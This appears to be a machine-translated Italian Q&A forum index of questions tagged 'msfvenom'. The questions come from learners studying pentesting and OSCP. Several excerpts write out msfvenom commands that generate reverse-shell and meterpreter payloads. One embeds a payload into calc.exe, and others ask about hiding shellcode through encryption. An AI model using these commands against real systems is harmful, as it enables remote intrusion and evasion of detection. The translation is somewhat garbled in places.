Domande con tag 'msfvenom'

domande con tag
1
risposta

Esempio pratico di pentesting con msfvenom

Sto aggiornando un piccolo articolo che è obsoleto, ma non so molto sul pentesting. Il framework è mfsvenom e il codice è: msfencode -x calc.exe -t loop-vbs -o final.vbs Prima era utilizzato msfencode e msfpayload , ma ora...
posta 18.04.2017 - 21:13
1
risposta

Avviso che genera payload OS X con msfvenom

Sto provando a generare un payload della shell inversa usando msfvenom . Quando corro msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f macho > reverse.macho che ho trovato su questo sito, ottengo...
posta 12.08.2018 - 08:13
2
risposte

è la codifica della crittografia per l'offuscamento del malware?

Sto imparando a nascondere e ad eseguire lo shellcode creato da msfvenom e sono arrivato a una tecnica in cui abbiamo lo shellcode e quando lo eseguiamo lo invertiremo. Sarebbe lo stesso se lo criptassi semplicemente tramite AES e poi lo decifra...
posta 13.12.2018 - 19:52
1
risposta

Reverse shell shell immediatamente dopo che la connessione è stata stabilita

al momento mi sto preparando per OSCP e so che sto lavorando su reverse shell. Usando msfconsole non è un problema avere una sessione di meterpreter, ma meterpreter non è permesso durante l'esame, quindi voglio andare in modo "manuale". Con m...
posta 16.11.2018 - 15:21
0
risposte

Msfvenom: crea il payload di Windows che richiede automaticamente i privilegi di amministratore

Quindi posso creare un payload di Windows con msfvenom con un semplice comando, ad esempio: msfvenom --platform Windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.58.109 LPORT=4485 EXITFUNC=thread -b '\x00' -f exe-only -o mypa...
posta 10.12.2018 - 06:25
1
risposta

Come rispondere alla richiesta HTTP Meterpreter inviata dal client

Prima di tutto mi scuso per gli errori come sono a livello principiante. Stavo esplorando Meterpreter HTTP Handler. Ho creato un payload con meterpreter reverse HTTP e scrivendo il mio server http per la gestione delle richieste invece di usare...
posta 13.10.2018 - 09:36
1
risposta

Passando al meterpreter nativo

Sono riuscito a ottenere una sessione meterpreter in esecuzione tra i miei server Kali Linux e Windows 2016 caricando un payload come servizio Web di Axis2 di Apache. Voglio passare a un meter meter di Windows (per utilizzare gli exploit di W...
posta 19.09.2018 - 14:45
0
risposte

Come rimuovere il carico utile generato da FatRat (Kali Linux) dal dispositivo Android (Lollipop 5.1)

Ho creato un Payload (.apk) di FatRat (Kali Linux) e l'ho installato su un dispositivo Android (Lollipop 5.1). Ora voglio rimuovere l'applicazione installata dal mio dispositivo ma non sono riuscito a farlo. Ho cercato l'elenco delle applicaz...
posta 10.06.2018 - 07:20
1
risposta

Msfvenom codifica senza carico utile

è possibile codificare semplicemente un eseguibile elfo usando gli encoder e finire con un eseguibile funzionante? o sto fraintendendo ciò che un encoder dovrebbe fare.     
posta 09.11.2017 - 23:01